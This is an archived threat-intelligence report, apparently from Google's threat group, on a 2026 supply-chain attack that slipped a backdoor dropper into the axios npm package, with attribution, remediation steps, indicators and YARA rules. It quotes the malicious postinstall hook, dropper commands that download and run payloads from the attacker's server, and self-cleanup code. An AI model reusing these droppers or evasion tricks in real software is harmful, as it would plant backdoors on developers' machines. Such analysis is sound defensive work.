{
	"id": "059edf69-92de-4303-a1b6-50a66b8a487e",
	"created_at": "2026-04-06T00:06:31.768392Z",
	"updated_at": "2026-04-10T03:37:58.945081Z",
	"deleted_at": null,
	"sha1_hash": "4d121bcd6d12a8de873f9b4d1819ae1253614445",
	"title": "North Korea-Nexus Threat Actor Compromises Widely Used Axios NPM Package in Supply Chain Attack",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 114005,
	"plain_text": "North Korea-Nexus Threat Actor Compromises Widely Used Axios\r\nNPM Package in Supply Chain Attack\r\nBy Google Threat Intelligence Group, Mandiant\r\nPublished: 2026-03-31 · Archived: 2026-04-05 17:57:38 UTC\r\nWritten by: Austin Larsen, Dima Lenz, Adrian Hernandez, Tyler McLellan, Christopher Gardner, Ashley Zaya,\r\nMichael Rudden, Mon Liclican\r\nIntroduction\r\nGoogle Threat Intelligence Group (GTIG) is tracking an active software supply chain attack targeting the popular\r\nNode Package Manager (NPM) package \"axios.\" Between March 31, 2026, 00:21 and 03:20 UTC, an attacker\r\nintroduced a malicious dependency named \"plain-crypto-js\" into axios NPM releases versions 1.14.1 and\r\n0.30.4. Axios is the most popular JavaScript library used to simplify HTTP requests, and these packages typically\r\nhave over 100 million and 83 million weekly downloads, respectively. This malicious dependency is an\r\nobfuscated dropper that deploys the WAVESHAPER.V2 backdoor across Windows, macOS, and Linux.\r\nGTIG attributes this activity to UNC1069, a financially motivated North Korea-nexus threat actor active since at\r\nleast 2018, based on the use of WAVESHAPER.V2, an updated version of WAVESHAPER previously used by\r\nthis threat actor. Further, analysis of infrastructure artifacts used in this attack shows overlaps with infrastructure\r\nused by UNC1069 in past activities.\r\nThis blog details the attack lifecycle, from the initial account compromise to the deployment of operating system\r\n(OS)-specific payloads, and provides actionable guidance for defenders to identify and mitigate this threat.\r\nCampaign Overview\r\nOn March 31, 2026, GTIG observed the introduction of plain-crypto-js version 4.2.1 as a dependency in the\r\nlegitimate axios package version 1.14.1. 
Analysis indicates the maintainer account associated with the axios\r\npackage was compromised, with the associated email address changed to an attacker-controlled account\r\n(ifstap@proton.me).\r\nThe threat actor used the postinstall hook within the \"package.json\" file of the malicious dependency to\r\nachieve silent execution. Upon installation of the compromised axios package, NPM automatically executes an\r\nobfuscated JavaScript dropper named \"setup.js\" in the background.\r\n \"scripts\": {\r\n \"test\": \"echo \\\"Error: no test specified\\\" \u0026\u0026 exit 1\",\r\n \"postinstall\": \"node setup.js\"\r\n }\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/north-korea-threat-actor-targets-axios-npm-package\r\nPage 1 of 9\n\nMalware Analysis\r\nThe plain-crypto-js package serves as a payload delivery vehicle. The core component, SILKBELL\r\n(setup.js, SHA256: e10b1fa84f1d6481625f741b69892780140d4e0e7769e7491e5f4d894c2e0e09), dynamically\r\nchecks the target system's operating system upon execution to deliver platform-specific payloads.\r\nThe script uses a custom XOR and Base64-based string obfuscation routine to conceal the command-and-control\r\n(C2 or C\u0026C) URL and host OS execution commands. To evade static analysis, it dynamically loads fs, os,\r\nand execSync. After successfully dropping the secondary payload, setup.js attempts to delete itself and revert\r\nthe modified package.json to hide forensic traces of the postinstall hook.\r\nOperating System-Specific Execution Paths\r\nDepending on the identified platform, the dropper executes the following routines.\r\nWindows\r\nThe dropper actively hunts for the native powershell.exe binary. To evade detection, it copies the legitimate\r\nexecutable to %PROGRAMDATA%\\wt.exe. 
It then downloads a PowerShell script via curl using the POST body\r\npackages.npm.org/product1 and saves it to the user's AppData Temp directory (e.g., %TEMP%\\6202033.ps1).\r\nThe payload is executed using the copied PowerShell binary masquerading as Windows Terminal (wt.exe) with\r\nhidden-window and execution-policy-bypass flags.\r\nSet objShell = CreateObject(\"WScript.Shell\")\r\nobjShell.Run \"cmd.exe /c curl -s -X POST -d packages.npm.org/product1 http://sfrclak[.]com:8000/6202033 \u003e %TEMP%\r\n \u0026 %PROGRAMDATA%\\wt.exe -w hidden -ep bypass -file %TEMP%\\6202033.ps1 http://sfrclak\r\nmacOS\r\nThe malware uses bash and curl to download a native Mach-O binary payload to\r\n/Library/Caches/com.apple.act.mond using the POST body packages.npm.org/product0. It modifies\r\npermissions to make the file executable and launches it via zsh in the background.\r\ntry\r\n do shell script \"\r\n curl -o /Library/Caches/com.apple.act.mond\r\n -d packages.npm.org/product0\r\n -s http://sfrclak.com:8000/6202033\r\n \u0026\u0026 chmod 770 /Library/Caches/com.apple.act.mond\r\n \u0026\u0026 /bin/zsh -c \"/Library/Caches/com.apple.act.mond http://sfrclak.com:8000/6202033 \u0026\"\r\n \u0026\u003e /dev/null\"\r\n\"\r\n end try\r\n do shell script \"rm -rf tmp/6202033\"\r\nLinux\r\nThe script downloads a Python backdoor to /tmp/ld.py using the POST body packages.npm.org/product2.\r\nCleanup\r\nAside from removing downloaded scripts in two execution branches, the script attempts to remove itself and\r\nreplace an injected package.json with an original one, which was stored as \"package.md\".\r\nconst K = __filename;\r\nt.unlink(K, (x =\u003e {}))\r\nt.unlink('package.json', (x =\u003e {})), t.rename('package.md', 'package.json', ord)\r\nWAVESHAPER.V2 Backdoor Capabilities\r\nThe platform-specific payloads ultimately deploy variants of a backdoor tracked by GTIG as WAVESHAPER.V2,\r\na 
backdoor written in C++ that targets macOS to collect system information, enumerate directories, or execute\r\nadditional payloads and that connects to the C2 provided via command-line arguments. Notably, GTIG identified\r\nadditional variants of WAVESHAPER.V2 written in PowerShell and Python to target diverse environments.\r\nRegardless of the operating system, the malware beacons to the C2 endpoint over port 8000 at 60-second\r\nintervals. The beacon consists of Base64-encoded JSON data and uses a hard-coded User-Agent:\r\nmozilla/4.0 (compatible; msie 8.0; windows nt 5.1; trident/4.0)\r\nFollowing the initial beaconing to the adversary infrastructure, WAVESHAPER.V2 continuously polls, pausing\r\nfor 60 seconds awaiting instructions. The server response determines the next action taken by the implant. The\r\nbackdoor supports multiple commands outlined in Table 1.\r\nCommand  Description\r\nkill  Terminates the malware's execution process.\r\nrundir  Retrieves detailed directory listings, including file paths, sizes, and creation/modification\r\ntimestamps for paths specified in the ReqPaths parameter.\r\nrunscript  Decodes and executes a provided AppleScript payload.\r\npeinject  Decodes, drops, ad-hoc signs, and executes an arbitrary binary payload with optional\r\nparameters.\r\nTable 1: WAVESHAPER.V2 commands\r\nOn Windows, persistence is achieved by creating a hidden batch file (%PROGRAMDATA%\\system.bat) and adding a\r\nnew entry named MicrosoftUpdate to HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run to launch it at\r\nlogon.\r\nWAVESHAPER.V2 acts as a fully functional RAT with the following capabilities:\r\nReconnaissance: Extracts system telemetry, including hostname, username, boot time, time zone, OS\r\nversion, and detailed running process lists.\r\nCommand Execution: Supports multiple 
execution methods, including in-memory Portable Executable\r\n(PE) injection and arbitrary shell commands. The shell execution command expects a script and script\r\nparameters from C2; if no script is provided, the parameter is executed as a PowerShell command, but if a\r\nscript is provided, it is either Base64-encoded or placed into a file depending on its size.\r\nFile System Enumeration: Returns detailed metadata for requested target directories by continuously\r\nrecursing through the file system.\r\nAttribution\r\nGTIG attributes this activity to UNC1069, a financially motivated North Korea-nexus threat actor active since\r\n2018. Analysis of the C2 infrastructure (sfrclak[.]com resolving to 142.11.206.73) revealed connections\r\nfrom a specific AstrillVPN node previously used by UNC1069. Additionally, adjacent infrastructure hosted on the\r\nsame ASN has been historically linked to UNC1069 operations.\r\nFurthermore, WAVESHAPER.V2 is a direct evolution of WAVESHAPER, a macOS and Linux backdoor\r\npreviously attributed to UNC1069. While the original WAVESHAPER uses a lightweight, raw binary C2 protocol\r\nand employs code packing, WAVESHAPER.V2 communicates using JSON, collects additional system\r\ninformation, and supports more backdoor commands. Despite these upgrades, both versions accept their C2 URL\r\ndynamically via command-line arguments, share identical C2 polling behaviors and an uncommon User-Agent\r\nstring, and deploy secondary payloads to identical temporary directories (e.g.,\r\n/Library/Caches/com.apple.act.mond).\r\nOutlook and Implications\r\nThe impact of this attack by North Korea-nexus actors is broad and has ripple effects as other popular packages\r\nrely on axios as a dependency. Notably, UNC1069 isn’t the only threat actor that has launched successful open\r\nsource supply chain attacks in recent weeks. 
UNC6780 (also known as TeamPCP) recently poisoned GitHub\r\nActions and PyPI packages associated with projects like Trivy, Checkmarx, and LiteLLM to deploy the\r\nSANDCLOCK credential stealer and facilitate follow-on extortion operations. \r\nHundreds of thousands of stolen secrets could potentially be circulating as a result of these recent attacks. This\r\ncould enable further software supply chain attacks, software as a service (SaaS) environment compromises\r\n(leading to downstream customer compromises), ransomware and extortion events, and cryptocurrency theft over\r\nthe near term. \r\nSupply chain compromise is a particularly dangerous tactic because it abuses the inherent trust that users and\r\nenterprise administrators place in hardware, software, and updates supplied by reputable vendors as well as the\r\ntrust they may not realize they are placing in collaborative code-sharing communities. Defenders should pay close\r\nattention to these campaigns, and enterprises should initiate dedicated efforts to assess the existing impact,\r\nremediate compromised systems, and harden environments against future attacks.\r\nRemediation \r\nGTIG urges all developers and organizations using the axios package to take immediate corrective action. Priority\r\nshould be given to auditing dependency trees for compromised versions, isolating affected hosts, and rotating any\r\npotentially exposed secrets or credentials. Following initial containment, organizations must implement long-term\r\nhardening through strict version pinning and enhanced supply-chain monitoring.\r\nVersion Control: Do not upgrade to axios version 1.14.1 or 0.30.4. 
Ensure corporate-managed NPM\r\nrepositories are configured to serve only known-good versions (e.g., 1.14.0 or earlier; 0.30.3 or earlier).\r\nDependency Pinning: Pin axios to a known safe version in your package-lock.json to prevent\r\naccidental upgrades.\r\nMalicious Package Audit: Inspect project lockfiles specifically for the 'plain-crypto-js' package (versions\r\n4.2.0 or 4.2.1). Use tools like Wiz or Open Source Insights for deeper dependency auditing.\r\nPipeline Security: Pause CI/CD deployments for any package relying on axios. Validate that builds are not\r\npulling \"latest\" versions before redeploying with pinned, safe versions.\r\nIncident Response: If plain-crypto-js is detected, assume the host environment is compromised.\r\nRevert the environment to a known-good state and rotate all credentials or secrets present on that machine.\r\nNetwork Defense: Block all traffic to sfrclak[.]com and the command \u0026 control IP: 142.11.206.73.\r\nMonitor and alert on any endpoint communication attempts to this domain.\r\nCache Remediation: Clear local and shared npm, yarn, and pnpm caches on all workstations and build\r\nservers to prevent re-infection during subsequent installs.\r\nEndpoint Protection: Deploy EDR to protect developer environments. Monitor for suspicious processes\r\nspawning from Node.js applications that match known Indicators of Compromise (IOCs).\r\nCredential Management: Rotate all tokens and API keys used by applications confirmed to have run\r\nindicators of compromise (IOCs).\r\nDeveloper Sandboxing \u0026 Secret Vaulting: Isolate development environments in containers or sandboxes\r\nto restrict host filesystem access, and migrate plaintext secrets to the OS keychain using aws-vault. 
This\r\nensures compromised packages cannot programmatically scrape credentials or execute malicious scripts\r\ndirectly on the host machine.\r\nIndicators of Compromise (IOCs)\r\nTo assist the wider community in hunting and identifying the activity outlined in this blog post, we have included\r\nIOCs in a free GTI Collection for registered users.\r\nNetwork Indicators\r\nIndicator  Type  Notes\r\n142.11.206.73  C2  WAVESHAPER.V2\r\nsfrclak[.]com  C2  WAVESHAPER.V2\r\nhttp://sfrclak[.]com:8000  C2  WAVESHAPER.V2\r\nhttp://sfrclak[.]com:8000/6202033  C2  WAVESHAPER.V2\r\n23.254.167.216  C2  Suspected UNC1069 Infrastructure\r\nFile Indicators\r\nFamily  Notes  SHA256\r\nWAVESHAPER.V2  Linux Python RAT  fcb81618bb15edfdedfb638b4c08a2af9cac9ecfa551af135a8402bf980375cf\r\nWAVESHAPER.V2  macOS Native Binary  92ff08773995ebc8d55ec4b8e1a225d0d1e51efa4ef88b8849d0071230c9645a\r\nWAVESHAPER.V2  Windows Stage 1  617b67a8e1210e4fc87c92d1d1da45a2f311c08d26e89b12307cf583c900d101\r\nWAVESHAPER.V2  N/A  ed8560c1ac7ceb6983ba995124d5917dc1a00288912387a6389296637d5f815c\r\nSILKBELL  N/A  e10b1fa84f1d6481625f741b69892780140d4e0e7769e7491e5f4d894c2e0e09\r\nN/A  system.bat  f7d335205b8d7b20208fb3ef93ee6dc817905dc3ae0c10a0b164f4e7d07121cd\r\nN/A  plain-crypto-js-4.2.1.tgz  58401c195fe0a6204b42f5f90995ece5fab74ce7c69c67a24c61a057325af668\r\nYARA Rules\r\nThese rules may be most useful on developer workstations, CI/build systems, and other suspected impacted hosts\r\nfor retrospective hunting and validation.\r\nrule G_Backdoor_WAVESHAPER.V2_PS_1\r\n{\r\n meta:\r\n description = \"Detects the WAVESHAPER.V2 PowerShell backdoor which communicates with C2 via base64 encod\r\n author = \"GTIG\"\r\n md5 = \"04e3073b3cd5c5bfcde6f575ecf6e8c1\"\r\n date_created = \"2026/03/31\"\r\n date_modified = \"2026/03/31\"\r\n rev = 1\r\n platforms = \"Windows\"\r\n 
family = \"WAVESHAPER.V2\"\r\n strings:\r\n $ss1 = \"packages.npm.org/product1\" ascii wide nocase\r\n $ss2 = \"Extension.SubRoutine\" ascii wide nocase\r\n $ss3 = \"rsp_peinject\" ascii wide nocase\r\n $ss4 = \"rsp_runscript\" ascii wide nocase\r\n $ss5 = \"rsp_rundir\" ascii wide nocase\r\n $ss6 = \"Init-Dir-Info\" ascii wide nocase\r\n $ss7 = \"Do-Action-Ijt\" ascii wide nocase\r\n $ss8 = \"Do-Action-Scpt\" ascii wide nocase\r\n condition:\r\n uint16(0) != 0x5A4D and filesize \u003c 100KB and 5 of ($ss*)\r\n}\r\nrule G_Hunting_Downloader_suspected_UNC1069_PS_1\r\n{\r\n meta:\r\n description = \"Detects PowerShell dropper associated with suspected UNC1069 and Axios npm package supply\r\n author = \"GTIG\"\r\n md5 = \"089e2872016f75a5223b5e02c184dfec\"\r\n date_created = \"2026/03/31\"\r\n date_modified = \"2026/03/31\"\r\n rev = 1\r\n platforms = \"Windows\"\r\n strings:\r\n $ss1 = \"start /min powershell -w h\" ascii wide nocase\r\n $ss2 = \"[scriptblock]::Create([System.Text.Encoding]::UTF8.GetString\" ascii wide nocase\r\n $ss3 = \"Invoke-WebRequest -UseBasicParsing\" ascii wide nocase\r\n $ss4 = \"-Method POST -Body\" ascii wide nocase\r\n $ss5 = \"packages.npm.org/product1\" ascii wide nocase\r\n condition:\r\n uint16(0) != 0x5A4D and filesize \u003c 5KB and all of them\r\n}\r\nrule G_Hunting_Downloader_SILKBELL_1\r\n{\r\n meta:\r\n description = \"Detects the obfuscated version of the JS NPM supply chain downloader using Base64 obfusca\r\n author = \"GTIG\"\r\n md5 = \"7658962ae060a222c0058cd4e979bfa1\"\r\n date_created = \"2026/03/31\"\r\n date_modified = \"2026/03/31\"\r\n rev = 1\r\n platforms = \"Any\"\r\n strings:\r\n $ss1 = \"OrDeR_7077\" ascii wide fullword\r\n $ss2 = \"String.fromCharCode(S^a^333)\" ascii wide\r\n $ss3 = \"\\\"TE9DQUw^\\\".replaceAll(\\\"^\\\",\\\"=\\\")\" ascii wide\r\n $ss4 = 
\"\\\"UFM_\\\".replaceAll(\\\"_\\\",\\\"=\\\")\" ascii wide\r\n $ss5 = \"\\\"U0NSXw--\\\".replaceAll(\\\"-\\\",\\\"=\\\")\" ascii wide\r\n $ss6 = \"\\\"UFNfQg--\\\".replaceAll(\\\"-\\\",\\\"=\\\")\" ascii wide\r\n $ss7 = \"\\\"d2hlcmUgcG93ZXJzaGVsbA((\\\".replaceAll(\\\"(\\\",\\\"=\\\")\" ascii wide\r\n condition:\r\n uint16(0) != 0x5A4D and filesize \u003c 100KB and all of them\r\n}\r\nGoogle Security Operations (SecOps)\r\nGoogle Security Operations (SecOps) customers have access to the following broad category rules and more\r\nunder the Mandiant Intel Emerging Threats rule pack.\r\nCurl Writing Apple System File to Staging Directory\r\nNode Spawning Nohup Osascript\r\nNode Spawning Windows Script Host With Delete Command\r\nWindows Script Host Spawning Shell With Curl\r\nWindows Terminal In Suspicious Staging Directory\r\nWiz\r\nWiz customers should check their Wiz Threat Center for information on this advisory and whether or not they are\r\nimpacted. For more information refer to Wiz’s blog post, Axios NPM Distribution Compromised in Supply Chain\r\nAttack.\r\nSource: https://cloud.google.com/blog/topics/threat-intelligence/north-korea-threat-actor-targets-axios-npm-package",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://cloud.google.com/blog/topics/threat-intelligence/north-korea-threat-actor-targets-axios-npm-package"
	],
	"report_names": [
		"north-korea-threat-actor-targets-axios-npm-package"
	],
	"threat_actors": [
		{
			"id": "dcbff54d-13ec-40b5-b3b9-b74a315669e1",
			"created_at": "2026-02-03T02:00:03.428641Z",
			"updated_at": "2026-04-10T02:00:03.937539Z",
			"deleted_at": null,
			"main_name": "UNC1069",
			"aliases": [
				"MASAN",
				"CryptoCore"
			],
			"source_name": "MISPGALAXY:UNC1069",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "63883709-27b5-4b65-9aac-c782780fbb28",
			"created_at": "2026-04-10T02:00:03.996704Z",
			"updated_at": "2026-04-10T02:00:03.996704Z",
			"deleted_at": null,
			"main_name": "TeamPCP",
			"aliases": [],
			"source_name": "MISPGALAXY:TeamPCP",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775433991,
	"ts_updated_at": 1775792278,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/4d121bcd6d12a8de873f9b4d1819ae1253614445.pdf",
		"text": "https://archive.orkl.eu/4d121bcd6d12a8de873f9b4d1819ae1253614445.txt",
		"img": "https://archive.orkl.eu/4d121bcd6d12a8de873f9b4d1819ae1253614445.jpg"
	}
}